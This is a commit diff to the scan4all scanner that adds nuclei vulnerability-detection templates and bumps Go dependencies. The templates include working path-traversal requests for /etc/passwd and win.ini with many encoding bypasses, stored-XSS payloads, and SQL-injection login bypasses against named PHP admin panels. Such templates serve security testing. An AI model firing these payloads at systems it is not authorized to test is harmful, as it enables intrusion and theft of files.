STRLCPY/scan4all

■ ■ ■ ■ ■ ■

.github/up.sh

		skipped 24 lines
25	25		#cat ./pkg/fingerprint/dicts/eHoleFinger.json\|jq ".fingerprint[].cms"\|wc -l
26	26		#cat ./pkg/fingerprint/dicts/localFinger.json\|jq ".fingerprint[].cms"\|wc -l
27	27		#cat ./pkg/fingerprint/dicts/fg.json\|jq ".[].kind"\|wc -l
28		-	git add config/nuclei-templates pocs_yml/ymlFiles
	28	+	git add config/nuclei-templates pocs_yml/ymlFiles vendor
29	29		git add vendor
30	30		git status
31	31		go build
		skipped 1 lines

■ ■ ■ ■ ■ ■

config/config.json

		skipped 65 lines
66	66		"KsubdomainRegxp": "([0-9a-zA-Z\\-]+\\.[0-9a-zA-Z\\-]+)$",
67	67		"naabu_dns": {},
68	68		"naabu": {"TopPorts": "1000","ScanAllIPS": true,"Threads": 50,"EnableProgressBar": false},
69		-	"priorityNmap": true,
	69	+	"priorityNmap": false,
70	70		"noScan": false,
71	71		"enableMultNuclei": false,
72	72		"enableNuclei": true,
		skipped 39 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2015/CVE-2015-4074.yaml

1	+	id: CVE-2015-4074
2	+	info:
3	+	name: Joomla Helpdesk Pro plugin before 1.4.0 - Local File Disclosure
4	+	author: 0x_Akoko
5	+	severity: high
6	+	description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
7	+	reference:
8	+	- https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html
9	+	- https://www.exploit-db.com/exploits/37666/
10	+	- https://www.cvedetails.com/cve/CVE-2015-4074
11	+	- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074
12	+	classification:
13	+	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
14	+	cvss-score: 7.5
15	+	cve-id: CVE-2015-4074
16	+	cwe-id: CWE-22
17	+	tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin
18	+
19	+	requests:
20	+	- method: GET
21	+	path:
22	+	- "{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"
23	+
24	+	matchers-condition: and
25	+	matchers:
26	+
27	+	- type: regex
28	+	regex:
29	+	- "root:[x*]:0:0"
30	+
31	+	- type: status
32	+	status:
33	+	- 200
34	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2016/CVE-2016-6601.yaml

1	+	id: CVE-2016-6601
2	+
3	+	info:
4	+	name: ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal
5	+	author: 0x_Akoko
6	+	severity: high
7	+	description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
8	+	reference:
9	+	- https://www.cvedetails.com/cve/CVE-2016-6601
10	+	- https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
11	+	- https://www.exploit-db.com/exploits/40229/
12	+	classification:
13	+	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
14	+	cvss-score: 7.5
15	+	cve-id: CVE-2016-6601
16	+	cwe-id: CWE-22
17	+	tags: cve,cve2016,zoho,lfi,webnms
18	+
19	+	requests:
20	+	- method: GET
21	+	path:
22	+	- "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"
23	+
24	+	matchers-condition: and
25	+	matchers:
26	+	- type: regex
27	+	regex:
28	+	- "root:.*:0:0"
29	+
30	+	- type: status
31	+	status:
32	+	- 200
33	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-46068.yaml

		skipped 11 lines
12	12		- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13	13		- https://nvd.nist.gov/vuln/detail/CVE-2021-46068
14	14		classification:
	15	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
	16	+	cvss-score: 4.8
15	17		cve-id: CVE-2021-46068
	18	+	cwe-id: CWE-79
16	19		metadata:
17		-	verified: true
	20	+	verified: "true"
18	21		tags: cve,cve2021,xss,vms,authenticated
19		-
20	22		requests:
21	23		- raw:
22	24		- \|
23		-	POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
	25	+	POST /classes/Login.php?f=login HTTP/1.1
24	26		Host: {{Hostname}}
25	27		Content-Type: application/x-www-form-urlencoded; charset=UTF-8
26	28
27	29		username={{username}}&password={{password}}
28	30
29	31		- \|
30		-	POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
	32	+	POST /classes/Users.php?f=save HTTP/1.1
31	33		Host: {{Hostname}}
32	34		Content-Type: application/x-www-form-urlencoded
33	35
34	36		id=1&firstname=Adminstrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin
35	37
36	38		- \|
37		-	GET /vehicle_service/admin/?page=user HTTP/1.1
	39	+	GET /admin/?page=user HTTP/1.1
38	40		Host: {{Hostname}}
39	41
40	42		req-condition: true
		skipped 12 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-46069.yaml

		skipped 21 lines
22	22		requests:
23	23		- raw:
24	24		- \|
25		-	POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
	25	+	POST /classes/Login.php?f=login HTTP/1.1
26	26		Host: {{Hostname}}
27	27		Content-Type: application/x-www-form-urlencoded; charset=UTF-8
28	28
29	29		username={{username}}&password={{password}}
30	30
31	31		- \|
32		-	POST /vehicle_service/classes/Master.php?f=save_mechanic HTTP/1.1
	32	+	POST /classes/Master.php?f=save_mechanic HTTP/1.1
33	33		Host: {{Hostname}}
34	34		Content-Type: application/x-www-form-urlencoded
35	35
36	36		id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&[email protected]&status=1
37	37
38	38		- \|
39		-	GET /vehicle_service/admin/?page=mechanics HTTP/1.1
	39	+	GET /admin/?page=mechanics HTTP/1.1
40	40		Host: {{Hostname}}
41	41
42	42		req-condition: true
		skipped 12 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-46071.yaml

		skipped 11 lines
12	12		- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13	13		- https://nvd.nist.gov/vuln/detail/CVE-2021-46071
14	14		classification:
	15	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
	16	+	cvss-score: 4.8
15	17		cve-id: CVE-2021-46071
	18	+	cwe-id: CWE-79
16	19		metadata:
17		-	verified: true
	20	+	verified: "true"
18	21		tags: cve,cve2021,xss,vms,authenticated
19		-
20	22		requests:
21	23		- raw:
22	24		- \|
23		-	POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
	25	+	POST /classes/Login.php?f=login HTTP/1.1
24	26		Host: {{Hostname}}
25	27		Content-Type: application/x-www-form-urlencoded; charset=UTF-8
26	28
27	29		username={{username}}&password={{password}}
28	30
29	31		- \|
30		-	POST /vehicle_service/classes/Master.php?f=save_category HTTP/1.1
	32	+	POST /classes/Master.php?f=save_category HTTP/1.1
31	33		Host: {{Hostname}}
32	34		Content-Type: application/x-www-form-urlencoded
33	35
34	36		id=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1
35	37
36	38		- \|
37		-	GET /vehicle_service/admin/?page=maintenance/category HTTP/1.1
	39	+	GET /admin/?page=maintenance/category HTTP/1.1
38	40		Host: {{Hostname}}
39	41
40	42		req-condition: true
		skipped 12 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-46072.yaml

		skipped 11 lines
12	12		- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13	13		- https://nvd.nist.gov/vuln/detail/CVE-2021-46072
14	14		classification:
	15	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
	16	+	cvss-score: 4.8
15	17		cve-id: CVE-2021-46072
	18	+	cwe-id: CWE-79
16	19		metadata:
17		-	verified: true
	20	+	verified: "true"
18	21		tags: cve,cve2021,xss,vms,authenticated
19		-
20	22		requests:
21	23		- raw:
22	24		- \|
23		-	POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
	25	+	POST /classes/Login.php?f=login HTTP/1.1
24	26		Host: {{Hostname}}
25	27		Content-Type: application/x-www-form-urlencoded; charset=UTF-8
26	28
27	29		username={{username}}&password={{password}}
28	30
29	31		- \|
30		-	POST /vehicle_service/classes/Master.php?f=save_service HTTP/1.1
	32	+	POST /classes/Master.php?f=save_service HTTP/1.1
31	33		Host: {{Hostname}}
32	34		Content-Type: application/x-www-form-urlencoded
33	35
34	36		id=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1
35	37
36	38		- \|
37		-	GET /vehicle_service/admin/?page=maintenance/services HTTP/1.1
	39	+	GET /admin/?page=maintenance/services HTTP/1.1
38	40		Host: {{Hostname}}
39	41
40	42		req-condition: true
		skipped 12 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-46073.yaml

1	+	id: CVE-2021-46073
2	+
3	+	info:
4	+	name: Vehicle Service Management System - Cross Site Scripting
5	+	author: TenBird
6	+	severity: medium
7	+	description: \|
8	+	A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel.
9	+	reference:
10	+	- https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS
11	+	- https://www.plsanu.com/vehicle-service-management-system-user-list-stored-cross-site-scripting-xss
12	+	- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13	+	- https://nvd.nist.gov/vuln/detail/CVE-2021-46073
14	+	classification:
15	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
16	+	cvss-score: 4.8
17	+	cve-id: CVE-2021-46073
18	+	cwe-id: CWE-79
19	+	metadata:
20	+	verified: "true"
21	+	tags: cve,cve2021,xss,vms,authenticated
22	+	requests:
23	+	- raw:
24	+	- \|
25	+	POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
26	+	Host: {{Hostname}}
27	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
28	+
29	+	username={{username}}&password={{password}}
30	+
31	+	- \|
32	+	POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
33	+	Host: {{Hostname}}
34	+	Content-Type: application/x-www-form-urlencoded
35	+
36	+	firstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1
37	+
38	+	- \|
39	+	GET /vehicle_service/admin/?page=user/list HTTP/1.1
40	+	Host: {{Hostname}}
41	+
42	+	req-condition: true
43	+	redirects: true
44	+	max-redirects: 2
45	+	cookie-reuse: true
46	+	matchers-condition: and
47	+	matchers:
48	+	- type: dsl
49	+	dsl:
50	+	- "contains(all_headers_3, 'text/html')"
51	+	- "status_code_3 == 200"
52	+	- 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")'
53	+	condition: and
54	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-29006.yaml

1	+	id: CVE-2022-29006
2	+
3	+	info:
4	+	name: Directory Management System 1.0 - SQLi Authentication Bypass
5	+	author: TenBird
6	+	severity: critical
7	+	description: \|
8	+	Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Directory Management System v1.0 allows attackers to bypass authentication.
9	+	reference:
10	+	- https://www.exploit-db.com/exploits/50370
11	+	- https://phpgurukul.com/directory-management-system-using-php-and-mysql/
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-29006
13	+	classification:
14	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
15	+	cvss-score: 9.8
16	+	cve-id: CVE-2022-29006
17	+	cwe-id: CWE-89
18	+	metadata:
19	+	verified: "true"
20	+	tags: cve,cve2022,sqli,auth-bypass,edb
21	+	requests:
22	+	- raw:
23	+	- \|
24	+	POST /admin/index.php HTTP/1.1
25	+	Host: {{Hostname}}
26	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
27	+
28	+	username=admin' or '1'='1&password=1&login=login
29	+
30	+	- \|
31	+	GET /admin/dashboard.php HTTP/1.1
32	+	Host: {{Hostname}}
33	+
34	+	cookie-reuse: true
35	+	matchers-condition: and
36	+	matchers:
37	+	- type: word
38	+	part: body
39	+	words:
40	+	- 'DMS \|\| Dashboard'
41	+	- 'DMS Admin'
42	+	- 'Admin Profile'
43	+	condition: and
44	+
45	+	- type: status
46	+	status:
47	+	- 200
48	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-29007.yaml

1	+	id: CVE-2022-29007
2	+
3	+	info:
4	+	name: Dairy Farm Shop Management System v1.0 - SQLi Authentication Bypass
5	+	author: TenBird
6	+	severity: critical
7	+	description: \|
8	+	Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Dairy Farm Shop Management System v1.0 allows attackers to bypass authentication.
9	+	reference:
10	+	- https://www.exploit-db.com/exploits/50365
11	+	- https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-29007
13	+	classification:
14	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
15	+	cvss-score: 9.8
16	+	cve-id: CVE-2022-29007
17	+	cwe-id: CWE-89
18	+	metadata:
19	+	verified: "true"
20	+	tags: cve,cve2022,sqli,auth-bypass,edb
21	+	requests:
22	+	- raw:
23	+	- \|
24	+	POST /dfsms/index.php HTTP/1.1
25	+	Host: {{Hostname}}
26	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
27	+
28	+	username=admin' or '1'='1&password=1&login=login
29	+
30	+	- \|
31	+	GET /dfsms/add-category.php HTTP/1.1
32	+	Host: {{Hostname}}
33	+
34	+	cookie-reuse: true
35	+	matchers-condition: and
36	+	matchers:
37	+	- type: word
38	+	part: body
39	+	words:
40	+	- '<title>Add Product</title>'
41	+	- '<span>Admin'
42	+	- 'DFSMS'
43	+	condition: and
44	+
45	+	- type: status
46	+	status:
47	+	- 200
48	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-29009.yaml

1	+	id: CVE-2022-29009
2	+
3	+	info:
4	+	name: Cyber Cafe Management System Project v1.0 - SQLi Authentication Bypass
5	+	author: TenBird
6	+	severity: critical
7	+	description: \|
8	+	Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Cyber Cafe Management System Project v1.0 allows attackers to bypass authentication.
9	+	reference:
10	+	- https://www.exploit-db.com/exploits/50355
11	+	- https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-29009
13	+	classification:
14	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
15	+	cvss-score: 9.8
16	+	cve-id: CVE-2022-29009
17	+	cwe-id: CWE-89
18	+	metadata:
19	+	verified: "true"
20	+	tags: cve2022,sqli,auth-bypass,edb,cve
21	+	requests:
22	+	- raw:
23	+	- \|
24	+	POST /ccms/index.php HTTP/1.1
25	+	Host: {{Hostname}}
26	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
27	+
28	+	username=%27+Or+1--+-&password=1&login=
29	+
30	+	- \|
31	+	GET /ccms/dashboard.php HTTP/1.1
32	+	Host: {{Hostname}}
33	+
34	+	cookie-reuse: true
35	+	matchers-condition: and
36	+	matchers:
37	+	- type: word
38	+	part: body
39	+	words:
40	+	- 'CCMS Admin Dashboard'
41	+	- 'CCMS ADMIN \| Admin'
42	+	condition: and
43	+
44	+	- type: status
45	+	status:
46	+	- 200
47	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/aem/aem-acs-common.yaml

1	+	id: aem-acs-common
2	+
3	+	info:
4	+	name: Adobe AEM ACS Common Exposure
5	+	author: dhiyaneshDk
6	+	severity: medium
7	+	reference:
8	+	- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
9	+	metadata:
10	+	shodan-query:
11	+	- http.title:"AEM Sign In"
12	+	- http.component:"Adobe Experience Manager"
13	+	tags: misconfig,aem,adobe
14	+
15	+	requests:
16	+	- method: GET
17	+	path:
18	+	- "{{BaseURL}}/etc/acs-commons/jcr-compare.html"
19	+	- "{{BaseURL}}/etc/acs-commons/workflow-remover.html"
20	+	- "{{BaseURL}}/etc/acs-commons/version-compare.html"
21	+	- "{{BaseURL}}/etc/acs-commons/oak-index-manager.html"
22	+
23	+	stop-at-first-match: true
24	+	matchers:
25	+	- type: word
26	+	part: body
27	+	words:
28	+	- '<title>Version Compare \| ACS AEM Commons</title>'
29	+	- '<title>Oak Index Manager \| ACS AEM Commons</title>'
30	+	- '<title>JCR Compare \| ACS AEM Commons</title>'
31	+	- '<title>Workflow Remover \| ACS AEM Commons</title>'
32	+	condition: or
33	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/technologies/drupal-detect.yaml

1	+	id: drupal-detect
2	+
3	+	info:
4	+	name: Drupal Detection
5	+	author: 1nf1n7y
6	+	severity: info
7	+	metadata:
8	+	verified: true
9	+	shodan-query: http.component:"Drupal"
10	+	tags: tech,drupal
11	+
12	+	requests:
13	+	- method: GET
14	+	path:
15	+	- "{{BaseURL}}"
16	+	- "{{BaseURL}}/CHANGELOG.txt"
17	+
18	+	matchers-condition: or
19	+	matchers:
20	+	- type: word
21	+	part: body
22	+	words:
23	+	- 'Initial release'
24	+	- 'Drupal 1.0.0'
25	+	condition: and
26	+
27	+	- type: word
28	+	part: body
29	+	words:
30	+	- 'content="Drupal'
31	+

■ ■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/generic/generic-linux-lfi.yaml

		skipped 1 lines
2	2
3	3		info:
4	4		name: Generic Linux - Local File Inclusion
5		-	author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley
	5	+	author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley,DhiyaneshDK
6	6		severity: high
7	7		description: Generic Linux is subject to local file Inclusion on searches for /etc/passwd on passed URLs.
	8	+	reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
8	9		classification:
9	10		cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
10	11		cvss-score: 7.5
		skipped 26 lines
37	38		- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
38	39		- "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
39	40		- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
	41	+	- "{{BaseURL}}/..///////..////..//////etc/passwd"
	42	+	- "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
	43	+	- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
	44	+	- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00"
	45	+	- "{{BaseURL}}/index.php?page=etc/passwd"
	46	+	- "{{BaseURL}}/index.php?page=etc/passwd%00"
	47	+	- "{{BaseURL}}/index.php?page=../../etc/passwd"
	48	+	- "{{BaseURL}}/index.php?page=....//....//etc/passwd"
	49	+	- "{{BaseURL}}/../../../../../../../../../etc/passwd"
40	50
41	51		stop-at-first-match: true
42	52		matchers:
		skipped 7 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/generic/generic-windows-lfi.yaml

		skipped 1 lines
2	2
3	3		info:
4	4		name: Windows - Local File Inclusion
5		-	author: mesaglio,sushantkamble
	5	+	author: mesaglio,sushantkamble,ritikchaddha
6	6		severity: high
7		-	description: Windows is vulnerable to local file inclusion because of searches for /windows/win.ini on passed URLs.
	7	+	description: \|
	8	+	Windows is vulnerable to local file inclusion because of searches for /windows/win.ini on passed URLs.
8	9		classification:
9	10		cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
10	11		cvss-score: 7.5
		skipped 13 lines
24	25		- "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
25	26		- "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
26	27		- "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
	28	+	- "{{BaseURL}}/..///////..////..//////windows/win.ini"
	29	+	- "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini"
	30	+	- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
	31	+	- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00"
	32	+	- "{{BaseURL}}/index.php?page=windows/win.ini"
	33	+	- "{{BaseURL}}/index.php?page=windows/win.ini%00"
	34	+	- "{{BaseURL}}/index.php?page=../../windows/win.ini"
	35	+	- "{{BaseURL}}/index.php?page=....//....//windows/win.ini"
	36	+	- "{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini"
	37	+	- "{{BaseURL}}/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini"
	38	+	- "{{BaseURL}}/../../../../../../../../../windows/win.ini"
	39	+	- "{{BaseURL}}/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"
27	40
28	41		stop-at-first-match: true
29	42		matchers:
30	43		- type: word
	44	+	part: body
31	45		words:
32	46		- "bit app support"
33	47		- "fonts"
34	48		- "extensions"
35	49		condition: and
36		-	part: body
37	50
38	51		# Enhanced by mp on 2022/07/22
39	52

config/scan4all_db.db

Binary file.

■ ■ ■ ■ ■ ■

go.mod

		skipped 18 lines
19	19		github.com/projectdiscovery/networkpolicy v0.0.1
20	20		github.com/remeh/sizedwaitgroup v1.0.0
21	21		go.uber.org/ratelimit v0.2.0
22		-	golang.org/x/net v0.0.0-20220812174116-3211cb980234
	22	+	golang.org/x/net v0.0.0-20220826154423-83b083e8dc8b
23	23		golang.org/x/sys v0.0.0-20220811171246-fbc7d0a398ab
24	24		)
25	25
		skipped 18 lines
44	44		github.com/pmezard/go-difflib v1.0.0 // indirect
45	45		github.com/projectdiscovery/hmap v0.0.2-0.20210917080408-0fd7bd286bfa
46	46		github.com/projectdiscovery/retryabledns v1.0.13 // indirect
47		-	github.com/projectdiscovery/stringsutil v0.0.0-20220712170325-48c50c332cb4
	47	+	github.com/projectdiscovery/stringsutil v0.0.0-20220612082425-0037ce9f89f3
48	48		github.com/syndtr/goleveldb v1.0.0 // indirect
49	49		github.com/yl2chen/cidranger v1.0.2 // indirect
50	50		go.uber.org/atomic v1.10.0
		skipped 17 lines
68	68		github.com/projectdiscovery/rawhttp v0.1.1
69	69		github.com/projectdiscovery/sliceutil v0.0.0-20220625085859-c3a4ecb669f4
70	70		github.com/projectdiscovery/urlutil v0.0.0-20210805190935-3d83726391c1
71		-	github.com/projectdiscovery/wappalyzergo v0.0.55
	71	+	github.com/projectdiscovery/wappalyzergo v0.0.57
72	72		github.com/rs/xid v1.4.0
73	73		go.etcd.io/bbolt v1.3.6 // indirect
74	74		)
		skipped 7 lines
82	82		github.com/Ullaakut/nmap v2.0.2+incompatible
83	83		github.com/ammario/ipisp/v2 v2.0.0
84	84		github.com/antchfx/htmlquery v1.2.5
85		-	github.com/antchfx/xmlquery v1.3.11
	85	+	github.com/antchfx/xmlquery v1.3.12
86	86		github.com/antlabs/strsim v0.0.2
87	87		github.com/apex/log v1.9.0
88	88		github.com/blang/semver v3.5.1+incompatible
		skipped 26 lines
115	115		github.com/projectdiscovery/folderutil v0.0.0-20220215113126-add60a1e8e08
116	116		github.com/projectdiscovery/iputil v0.0.0-20220620153941-036d511e4097
117	117		github.com/projectdiscovery/nuclei-updatecheck-api v0.0.0-20220726130814-981d44a34f84
118		-	github.com/projectdiscovery/nuclei/v2 v2.7.6
	118	+	github.com/projectdiscovery/nuclei/v2 v2.7.7
119	119		github.com/projectdiscovery/subfinder/v2 v2.5.2
120	120		github.com/satori/go.uuid v1.2.0
121	121		github.com/shirou/gopsutil/v3 v3.22.7
		skipped 28 lines
150	150		github.com/alecthomas/template v0.0.0-20190718012654-fb15b899a751 // indirect
151	151		github.com/alecthomas/units v0.0.0-20211218093645-b94a6e3cc137 // indirect
152	152		github.com/andybalholm/cascadia v1.3.1 // indirect
153		-	github.com/andygrunwald/go-jira v1.15.1 // indirect
	153	+	github.com/andygrunwald/go-jira v1.16.0 // indirect
154	154		github.com/antchfx/xpath v1.2.1 // indirect
155	155		github.com/antlr/antlr4/runtime/Go/antlr v0.0.0-20220418222510-f25a4f6275ed // indirect
156		-	github.com/aws/aws-sdk-go v1.44.77 // indirect
	156	+	github.com/aws/aws-sdk-go v1.44.83 // indirect
157	157		github.com/aymerick/douceur v0.2.0 // indirect
158	158		github.com/bits-and-blooms/bitset v1.2.0 // indirect
159	159		github.com/bits-and-blooms/bloom/v3 v3.0.1 // indirect
		skipped 22 lines
182	182		github.com/gobwas/ws v1.1.0 // indirect
183	183		github.com/gofrs/uuid v4.2.0+incompatible // indirect
184	184		github.com/gogf/gf v1.16.6 // indirect
185		-	github.com/golang-jwt/jwt/v4 v4.3.0 // indirect
	185	+	github.com/golang-jwt/jwt/v4 v4.4.2 // indirect
186	186		github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe // indirect
187	187		github.com/golang-sql/sqlexp v0.1.0 // indirect
188	188		github.com/golang/glog v1.0.0 // indirect
		skipped 80 lines
269	269		github.com/valyala/bytebufferpool v1.0.0 // indirect
270	270		github.com/valyala/fasttemplate v1.2.1 // indirect
271	271		github.com/weppos/publicsuffix-go v0.20.0 // indirect
272		-	github.com/xanzy/go-gitlab v0.72.0 // indirect
	272	+	github.com/xanzy/go-gitlab v0.73.1 // indirect
273	273		github.com/xdg-go/pbkdf2 v1.0.0 // indirect
274	274		github.com/xdg-go/scram v1.0.2 // indirect
275	275		github.com/xdg-go/stringprep v1.0.2 // indirect
		skipped 23 lines

■ ■ ■ ■ ■ ■

go.sum

		skipped 93 lines
94	94		github.com/andybalholm/cascadia v1.3.1 h1:nhxRkql1kdYCc8Snf7D5/D3spOX+dBgjA6u8x004T2c=
95	95		github.com/andybalholm/cascadia v1.3.1/go.mod h1:R4bJ1UQfqADjvDa4P6HZHLh/3OxWWEqc0Sk8XGwHqvA=
96	96		github.com/andygrunwald/go-jira v1.14.0/go.mod h1:KMo2f4DgMZA1C9FdImuLc04x4WQhn5derQpnsuBFgqE=
97		-	github.com/andygrunwald/go-jira v1.15.1 h1:6J9aYKb9sW8bxv3pBLYBrs0wdsFrmGI5IeTgWSKWKc8=
98	97		github.com/andygrunwald/go-jira v1.15.1/go.mod h1:GIYN1sHOIsENWUZ7B4pDeT/nxEtrZpE8l0987O67ZR8=
	98	+	github.com/andygrunwald/go-jira v1.16.0 h1:PU7C7Fkk5L96JvPc6vDVIrd99vdPnYudHu4ju2c2ikQ=
	99	+	github.com/andygrunwald/go-jira v1.16.0/go.mod h1:UQH4IBVxIYWbgagc0LF/k9FRs9xjIiQ8hIcC6HfLwFU=
99	100		github.com/antchfx/htmlquery v1.2.3/go.mod h1:B0ABL+F5irhhMWg54ymEZinzMSi0Kt3I2if0BLYa3V0=
100	101		github.com/antchfx/htmlquery v1.2.5 h1:1lXnx46/1wtv1E/kzmH8vrfMuUKYgkdDBA9pIdMJnk4=
101	102		github.com/antchfx/htmlquery v1.2.5/go.mod h1:2MCVBzYVafPBmKbrmwB9F5xdd+IEgRY61ci2oOsOQVw=
102		-	github.com/antchfx/xmlquery v1.3.11 h1:8aRK7l3+dJjL8ZmwgVzG5AXysrP7Mss2424tfntKWKY=
103		-	github.com/antchfx/xmlquery v1.3.11/go.mod h1:ywPcYkN0GvURUxXpUujaMVvuLSOYQBzoSfHKfAYezCE=
	103	+	github.com/antchfx/xmlquery v1.3.12 h1:6TMGpdjpO/P8VhjnaYPXuqT3qyJ/VsqoyNTmJzNBTQ4=
	104	+	github.com/antchfx/xmlquery v1.3.12/go.mod h1:3w2RvQvTz+DaT5fSgsELkSJcdNgkmg6vuXDEuhdwsPQ=
104	105		github.com/antchfx/xpath v1.1.6/go.mod h1:Yee4kTMuNiPYJ7nSNorELQMr1J33uOpXDMByNYhvtNk=
